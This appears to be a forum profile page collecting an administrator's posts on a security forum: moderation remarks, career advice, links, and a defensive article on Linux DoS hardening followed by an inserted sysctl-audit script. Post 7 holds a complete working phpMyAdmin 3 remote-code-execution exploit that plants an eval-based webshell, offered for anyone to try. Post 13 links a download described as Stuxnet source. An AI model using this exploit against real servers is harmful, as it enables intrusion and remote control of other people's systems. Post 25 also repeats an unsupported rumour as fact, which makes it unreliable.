Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. You have to replace "//TODO" with a piece of code, and the code, as it is, must print 31337. It's a "trick".
  2. The server is the component that does the "nasty" stuff, which is why the server is detectable. The client only "commands" the server what to do.
  3. Mozilla Firefox Download: http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-mozilla-aurora/firefox-7.0a2.en-US.win32.installer.exe
  4. Another worthless topic. We'll close a few more of these...
  5. He has had a ban for a long time, but the eye doesn't reach as far as ha5hz0r Banned
  6. Nytro

    missing message?

    I hadn't seen it. I don't know, I'll see if something can be done...
  7. phpMyAdmin3 (pma3) Remote Code Execution Exploit

     ```python
     #!/usr/bin/env python
     # coding=utf-8
     # pma3 - phpMyAdmin3 remote code execute exploit
     # Author: wofeiwo<wofeiwo@80sec.com>
     # Thx Superhei
     # Tested on: 3.1.1, 3.2.1, 3.4.3
     # CVE: CVE-2011-2505, CVE-2011-2506
     # Date: 2011-07-08
     # Have fun, DO *NOT* USE IT TO DO BAD THING.
     ################################################
     # Requirements: 1. "config" directory must created&writeable in pma directory.
     #               2. session.auto_start = 1 in php.ini configuration.

     import os,sys,urllib2,re

     def usage(program):
         print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code execute exploit"
         print "Usage: %s <PMA_url>" % program
         print "Example: %s http://www.test.com/phpMyAdmin" % program
         sys.exit(0)

     def main(args):
         try:
             if len(args) < 2:
                 usage(args[0])

             if args[1][-1] == "/":
                 args[1] = args[1][:-1]

             print "[+] Trying get form token&session_id.."
             content = urllib2.urlopen(args[1]+"/index.php").read()
             r1 = re.findall("token=(\w{32})", content)
             r2 = re.findall("phpMyAdmin=(\w{32,40})", content)

             if not r1:
                 r1 = re.findall("token\" value=\"(\w{32})\"", content)
             if not r2:
                 r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content)
             if len(r1) < 1 or len(r2) < 1:
                 print "[-] Cannot find form token and session id...exit."
                 sys.exit(-1)

             token = r1[0]
             sessionid = r2[0]
             print "[+] Token: %s , SessionID: %s" % (token, sessionid)

             print "[+] Trying to insert payload in $_SESSION.."
             uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA"
             url = args[1]+uri

             opener = urllib2.build_opener()
             opener.addheaders.append(('Cookie', 'phpMyAdmin=%s; pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' % (sessionid, sessionid)))
             urllib2.install_opener(opener)
             urllib2.urlopen(url)

             print "[+] Trying get webshell.."
             postdata = "phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save" % (sessionid, token)
             url = args[1]+"/setup/config.php"

             # print "[+]Postdata: %s" % postdata
             urllib2.urlopen(url, postdata)
             print "[+] All done, pray for your lucky!"

             url = args[1]+"/config/config.inc.php"
             opener.addheaders.append(('Code', 'phpinfo();'))
             urllib2.install_opener(opener)
             print "[+] Trying connect shell: %s" % url
             result = re.findall("System \</td\>\<td class=\"v\"\>(.*)\</td\>\</tr\>", urllib2.urlopen(url).read())
             if len(result) == 1:
                 print "[+] Lucky u! System info: %s" % result[0]
                 print "[+] Shellcode is: eval(getenv('HTTP_CODE'));"
             else:
                 print "[-] Cannot get webshell."

         except Exception, e:
             print e

     if __name__ == "__main__" : main(sys.argv)
     ```

     I haven't tried it; whoever is interested can try it. Source: phpMyAdmin3 (pma3) Remote Code Execution Exploit
  8. Nytro

    missing message?

    Technical problems. Basically I don't know whether you will recover your message.
  9. Nytro

    xaren here

    Welcome. We are all Romanian, so you'll be able to speak freely in Romanian.
  10. "In February 1998, ReactOS began." (ReactOS's history - ReactOS Website) It will take about 20 years before it reaches the level Microsoft reached with Windows 7.
  11. I got a job (not with the police) and I no longer have as much free time as I used to. But even now, from work, I log on to RST to see what the situation is. Homework: write your CV! That way you'll see what knowledge you've accumulated. That way you'll see what you put under the "Projects" category. Don't list 100 programming languages that you've heard of or in which you've read some source code.
      - You know C/C++? Then you know the difference between "const int *p" and "int const *p" (there is none) and the difference between the copy constructor and overloading operator = with a parameter that is a reference to the current type, or what placement new is, or virtual inheritance.
      - You know VB6? Then you also know how many kinds of Property there are (Let, Get, Set), what Option Explicit/Base/Module does, and many other things.
      - You know PHP? Then you know what __get and __invoke are all about, and you know how to serialize an object and create an abstract class.

      If you don't know things like these, you can't say you know that programming language just because you managed to write a "Hello world" or call two functions. Try this experiment; you won't like the results. Then you can compare your CVs, for example. Or you can have some technical discussions, and then you'll see who is better. Talk to Tinkode, daemien, tdxev about SQL Injection, you lot with your Havij, then see how much SQL Injection you know. That's just an example. Anyway, it's not "RST" that is to blame. If RST is going badly, WE are to blame, meaning also YOU, the ones with the big mouths, who fought so hard for RST and who stayed up until 4 in the morning to find interesting things on Twitter and post them, just to help the others. Look at your own posts, and especially the topics you created, then come here with suggestions. Do it at least out of curiosity. Yes, the problem is this "friendship" among you, the fact that you "love" each other. You attack each other by any means and try to do harm for no purpose. You insult and swear at each other as if whoever swears better is tougher. You get upset if someone gives you constructive criticism, you get upset if someone "scolds" you. That is proof of immaturity. Blah blah, if you have nobody to blame, you can blame me. I'm very sensitive and I'll go and cry again because an RST member is scolding me.
  12. /* This file has been generated by the Hex-Rays decompiler. Copyright © 2009 Hex-Rays <info@hex-rays.com> Detected compiler: Visual C++ */
  13. Stuxnet Source Code Released

      Posted by The Hacker News On 1:05 AM

      Stuxnet is a Microsoft Windows computer worm discovered in July 2010 that targets industrial software and equipment. While it is not the first time that crackers have targeted industrial systems, it is the first discovered malware that spies on and subverts industrial systems, and the first to include a programmable logic controller (PLC) rootkit. Stuxnet is designed to programmatically alter Programmable Logic Controllers (PLCs) used in those facilities. In an ICS environment, the PLCs automate industrial type tasks such as regulating flow rate to maintain pressure and temperature controls.

      Download: http://www.multiupload.com/BDNYSCY5PC

      Source: Stuxnet Source Code Released Online - Download Now ~ THN : The Hacker News
  14. Nytro

    Shellcode

    Lots of interesting stuff: http://skypher.com/wiki/index.php/Main_Page
  15. All respect to those who made it, smart guys.
  16. There isn't a lot of common sense around here, but I think you'll settle in quickly. Welcome.
  17. "Technical" problems. No. Still VIP.
  18. Protecting Linux Against DoS/DDoS Attacks

      Tuesday, June 28, 2011
      Contributed By: Jamie Adams

      When I first heard ridiculous-sounding terms like smurf attack, fraggle attack, Tribal Flood Network (TFN), Trinoo, TFN2K, and stacheldraht, I didn't take them too seriously for a couple of reasons: I worked mainly on non-Internet facing systems, and I was never a victim. I thought it was primarily a network or application administrator's problem. I am not too proud to admit that I was completely wrong. The truth is that I only had a grasp of the impact of such attacks but I didn't know anything about the methods and the things that can and should be done at the operating system level.

      I have been neck-deep in completing documentation for our product's Common Criteria for Information Technology Security Evaluation (ISO/IEC 15408) submission so I hadn't had much time to think about topics for a blog post. Besides, how can I compete with all of these eye-catching, dramatic headlines about LulzSec, Anonymous, and Ryan Cleary?

      A co-worker asked me how our Security Blanket operating system lock down tool could help against denial-of-service (DoS) attacks. So began my research and I quickly had the epiphany that I barely knew anything about DoS attacks. Of course this topic is far too broad and complex to cover in one blog post but I am going to highlight some of my findings.

      First of all, I strongly recommend visiting the SANS Institute InfoSec Reading Room and reading “A Summary of DoS/DDoS Prevention, Monitoring and Mitigation Techniques in a Service Provider Environment.” Secondly, read the W3C's “The World Wide Web Security FAQ - Securing against Denial of Service attacks.”

      In “HACKING the art of exploitation” [1], Erikson describes two general forms of DoS attacks: those that crash services and those that flood services. Wikipedia goes on to describe five basic types of attacks:

      - Consumption of computational resources, such as bandwidth, disk space, or processor time.
      - Disruption of configuration information, such as routing information.
      - Disruption of state information, such as unsolicited resetting of TCP sessions.
      - Disruption of physical network components.
      - Obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.

      The W3C defines DoS as “an attack designed to render a computer or network incapable of providing normal services. The most common DoS attacks will target the computer's network bandwidth or connectivity. Bandwidth attacks flood the network with such a high volume of traffic, that all available network resources are consumed and legitimate user requests can not get through. Connectivity attacks flood a computer with such a high volume of connection requests, that all available operating system resources are consumed, and the computer can no longer process legitimate user requests.”

      The W3C differentiates a DoS attack from a Distributed Denial of Service (DDoS) attack. The DDoS “attack uses many computers to launch a coordinated DoS attack against one or more targets. Using client/server technology, the perpetrator is able to multiply the effectiveness of the Denial of Service significantly by harnessing the resources of multiple unwitting accomplice computers which serve as attack platforms.”

      In the case of smurf and fraggle attacks, one method of prevention is to configure the router to block broadcast packets that did not originate from that network. On Linux systems, you can configure the kernel to disregard ICMP ECHO and TIMESTAMP requests that were sent to broadcast or multicast addresses by setting the kernel parameter net.ipv4.icmp_echo_ignore_broadcasts to one.

      When it comes to “SYN flood” DoS form of attacks, you can configure Linux to send out requests (syncookies) to remote hosts if they are flooding your system’s backlog queue with SYN packets; to enable this set the kernel parameter net.ipv4.tcp_syncookies to one. These requests check whether or not the inbound SYN packets are legitimate. In cases where these inbound SYN packets are not legitimate, your system might be experiencing a “SYN flood” DoS attack. Enabling this option on a system under normal load is useful. If your system is under high load it will make new connections but without advanced features such as explicit congestion notification (ECN) or selective acknowledgment (SACK).

      All of the normal hardening procedures for the operating system will of course help. Namely, it will help reduce the likelihood your system will become compromised and become the platform for which attacks will be launched. Additionally, it is critical to know what software is present on your system. One technique to monitor this is to baseline (or fingerprint) your system to include the use of cryptographic hashes where possible. Then periodically, perform another baseline and compare it to the previous one.

      The use of host-based firewalls (e.g., iptables) is strongly encouraged as well as disabling of unnecessary server services. System minimization has been a topic in many of my posts before and I believe it is one of the easiest but most effective techniques because it reduces your “attack surface.” The W3C FAQ also says, “assume a service should be turned off, unless it is absolutely required.” And I would take it one step further by removing the software packages associated with those unused services.

      Safeguarding and monitoring operating systems against DoS and DDoS are areas which I continue to learn about and develop techniques. Please, share your knowledge and techniques so we all might learn.

      Source: https://www.infosecisland.com/blogview/14788-Protecting-Linux-Against-DoSDDoS-Attacks.html
      • 1
      • Upvote
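Added example, not part of the quoted article or of the forum post: a small auditor for sysctl-style configuration text that reports whether the two kernel parameters the article names, net.ipv4.icmp_echo_ignore_broadcasts and net.ipv4.tcp_syncookies, end up set to one. The function names and the sample file are constructed for illustration; the check covers what the file would apply, while `sysctl -n <key>` shows the value the running kernel has.

```shell
#!/bin/sh
# Added example: audit sysctl-style configuration text for the two DoS-related
# settings named in the article. Function names are hypothetical.

# effective_value FILE KEY: print the value KEY ends up with in FILE.
# Later assignments override earlier ones, so the last match wins.
effective_value() {
    awk -v want="$2" '
        /^[ \t]*([#;]|$)/ { next }          # comments and blank lines
        {
            line = $0
            sub(/^[ \t]*-?/, "", line)      # leading "-" only means "ignore errors"
            eq = index(line, "=")
            if (eq == 0) next
            key = substr(line, 1, eq - 1)
            val = substr(line, eq + 1)
            gsub(/[ \t]/, "", key)
            gsub("/", ".", key)             # net/ipv4/x names the same key as net.ipv4.x
            gsub(/^[ \t]+|[ \t]+$/, "", val)
            if (key == want) found = val
        }
        END { if (found != "") print found }
    ' "$1"
}

# audit_dos_sysctl FILE: report both settings; return non-zero if either is not 1.
audit_dos_sysctl() {
    rc=0
    for key in net.ipv4.icmp_echo_ignore_broadcasts net.ipv4.tcp_syncookies; do
        val=$(effective_value "$1" "$key")
        if [ "$val" = "1" ]; then
            echo "OK    $key = 1"
        else
            echo "FAIL  $key = ${val:-unset} (expected 1)"
            rc=1
        fi
    done
    return "$rc"
}

# Constructed sample: syncookies is enabled, then silently disabled further down.
sample=$(mktemp)
cat > "$sample" <<'EOF'
# hardening
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.tcp_syncookies = 1
; vendor snippet appended later
-net/ipv4/tcp_syncookies=0
EOF
audit_dos_sysctl "$sample" || true
rm -f "$sample"
```

On the constructed sample the broadcast setting passes and syncookies fails, because the later slash-form line overrides the earlier assignment.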
  19. A Window Into Mobile Device Security
      Examining the security approaches employed in Apple’s iOS and Google’s Android
      Carey Nachenberg, VP, Fellow

      Contents
      - Executive Summary
      - Introduction
      - Mobile Security Goals
        - Web-based and network-based attacks
        - Malware
        - Social Engineering Attacks
        - Resource Abuse
        - Data Loss
        - Data Integrity Threats
      - Device Security Models
        - Apple iOS
        - Android
      - iOS vs. Android: Security Overview
      - Device Ecosystems
      - Mobile Security Solutions
        - Mobile Antivirus
        - Secure Browser
        - Mobile Device Management (MDM)
        - Enterprise Sandbox
        - Data Loss Prevention (DLP)
      - Conclusion

      Download: http://www.symantec.com/content/en/us/about/media/pdfs/symc_mobile_device_security_june2011.pdf
  20. Many have received one. There is the "Help" category. There is the "Requests" category. There are n posts in which I specify not to ask for help or other nonsense in this category. There are x people who got a warning for this sort of thing; you don't need to feel special.
  21. They're usually like today, but only today do I have some free time and the time to hand out warnings and bans. Since I haven't really been active for a week or two.
  22. Yes, it can be very useful. Anyway, it has only been public for a short time. I'll run some tests to see whether I can manage some automation.
  23. Very interesting. You only have interesting posts. Ban.
  24. Nytro

    nytro_rst

    It was an experiment. I announced it "x" times. And it wasn't me who added the 1000 people in the list, only a few. And I still don't understand where I kept getting adds related to Metin from. And there is the "Ignore" option.
  25. Nytro

    University

    At the Military Technical Academy it's not exactly "nice"... For several reasons:
    - you don't have much freedom: you can't really skip classes, the rooms are sometimes inspected, you're not allowed to go out on your own or come back later than 23:00 I think, you have to go out with a leave pass, a whole lot of things
    - you have to know, and you'll be drilled with, a lot of math and physics. If you want to go there for computer science, it's not the right choice
    - yes, you'll come out with a salary, a stable income, but you have to sign a 10-year contract, and you can't resign, I think they make you pay damages
    - same with the university: if you want to drop out, you have to pay for the time you stayed
    - they put bromide in your food/drink, in the tea as I understand it, so that you don't get erections anymore. So that you don't feel so much like having sex
    - wake-up call in the morning, you run laps around there and all sorts of other nonsense, besides sweeping the yard
    - you have to wear those ugly uniforms; in summer you die of heat, in winter you freeze
    - the salaries aren't very high; my advice is to apply to STS, the physical tests are a joke but the written ones are harder; at MApN, as I understand it, the salaries aren't very high

    There are many reasons why I recommend that you not go there, but it's your choice. I'm telling you my opinion and what I've discussed with people from there; I know several.